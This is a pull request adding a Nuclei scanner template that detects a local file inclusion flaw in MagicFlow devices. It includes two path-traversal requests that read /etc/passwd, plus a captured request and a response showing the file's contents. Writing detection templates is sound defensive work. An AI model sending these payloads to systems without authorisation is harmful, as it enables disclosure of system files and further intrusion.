### PR TITLE
Create magicflow-lfi.yaml

### DIFF
--- a/vulnerabilities/other/magicflow-lfi.yaml
+++ b/vulnerabilities/other/magicflow-lfi.yaml
@@ -1,0 +1,25 @@
+id: magicflow-lfi
+
+info:
+  name: MagicFlow - Local File Inclusion
+  author: gy741
+  severity: critical
+  reference: https://www.seebug.org/vuldb/ssvid-89258
+  tags: magicflow,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
+      - "{{BaseURL}}/msa/../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Hello,

Added MagicFlow - Local File Inclusion



### Template Validation

I've validated this template locally?
- [v] YES
- [ ] NO


Request:
```
GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1
Host: XXX.XXX.XXX.XXX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

```

Response:
```
HTTP/1.1 200 OK
Server: MSA/1.0
Content-disposition: attachment; filename="msagroup.txt"
Content-type: application/octet-stream
Content-transfer-encoding:BINARY

root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
```

#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)